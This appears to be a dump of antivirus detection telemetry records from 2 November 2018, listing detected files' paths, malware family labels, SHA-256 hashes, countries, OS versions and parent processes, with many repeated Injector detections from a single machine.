  Row(detection=Row(filename='2.exe', filepath='E:\\Box Files\\SPDMTK_FILES\\Box Installer\\Miracle Falcon Box\\2.exe', filesize=960000, name='W32/Sality.AG.#M1.#R1'), hash='252649fe13bd4f0e7baf7f453e19fe39432f294891d9b4941328b3af91194a6a', metadata=Row(cmdline='\\\\\\/onboot', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-02T11:48:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nenosa.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\tmp6823540\\nenosa.exe', filesize=384000, name='HEUR/AGEN.1019710.#M1.#R1'), hash='49824b90c407fe18622be622af760de3518c95d8718e03ea11132b3f914b813d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134857-3746158f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-134857-3746158F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061337-68030f70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061337-68030F70', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050321-96d7a7ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050321-96D7A7FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001e15', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001e15', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unrar.exe', filepath='C:\\Program Files (x86)\\WinRAR\\UnRAR.exe', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='51f05e67de195aa9ccfb154716f37be3014d31144102385acbb2c70fb51b0404', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:2stI6VzzEkOqZfg0.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T06:46:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061225-3d08a7a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061225-3D08A7A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winver.exe', filepath='d:\\windows\\winsxs\\x86_microsoft-windows-winver_31bf3856ad364e35_6.1.7600.16385_none_b627d45ffdcc6f00\\winver.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='4b84924332e1bf58bf9997b86ad2676c49a34f67f52b5b01d31ccd9d0579a633', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:19:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vpfmqbaq.exe', filepath='\\\\?\\F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\vPFMqBaQ.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:03:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052510-a329aaae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052510-A329AAAE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061432-88dd336e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061432-88DD336E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062313-bf63b9a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062313-BF63B9A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050721-25efe95d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050721-25EFE95D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000007ae', filepath='C:\\Windows\\Temp\\tmp00000111\\tmp000007ae', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T21:45:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T14:09:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055251-8125a708', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055251-8125A708', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='62d7835ba92d38b165a02f6b16f881f7be7c6931fbda01a4ff38506bf7421a96', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='untb27f.tmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\UB211.tmp\\UNTB27F.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4a4740ecc4b6a3fd9936ab1cc2820d2829f30129f73902dab8c55be28577ab5f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133023-682ffd8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133023-682FFD8F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:33:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055209-687845c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055209-687845C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='to trinh bau bttndan.exe', filepath='G:\\\xa0\\HOI NGHI 2017\\TO TRINH BAU BTTNDAN.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='671529e197693aa9b48d4480ef080e84f0cc182f3587bffbf91c6388f468d1e0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T11:14:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061430-87bca637', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061430-87BCA637', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052605-c3f44222', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052605-C3F44222', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061925-37282497', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061925-37282497', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052058-0d1111ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052058-0D1111EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053542-1bb61fc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053542-1BB61FC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060027-90fee8f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060027-90FEE8F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052148-2ae6eee3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052148-2AE6EEE3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061149-27b3f634', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061149-27B3F634', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051626-6b24d3ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051626-6B24D3EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061155-2af24871', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061155-2AF24871', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053005-52feefb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053005-52FEEFB6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060104-a6e58bc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060104-A6E58BC8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050449-cb64a045', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050449-CB64A045', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054927-07be020b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054927-07BE020B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055156-60b6a0fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055156-60B6A0FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062519-0aa4b12a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062519-0AA4B12A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054549-860abad0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054549-860ABAD0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061006-ea305721', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061006-EA305721', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052955-4d24816b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052955-4D24816B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060804-a1650374', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060804-A1650374', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053912-996a2413', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053912-996A2413', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053026-5fa3921e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053026-5FA3921E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050422-bb2dbd2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050422-BB2DBD2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060546-4f2c9b18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060546-4F2C9B18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050816-472afcca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050816-472AFCCA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:23:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:20:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060733-8f17969e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060733-8F17969E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060230-da42abe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060230-DA42ABE0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053202-98ee43ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053202-98EE43EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050848-5a1473d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050848-5A1473D6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053743-644e63c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053743-644E63C2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:42Z'), dt=datetime.date(2018, 11, 2)),
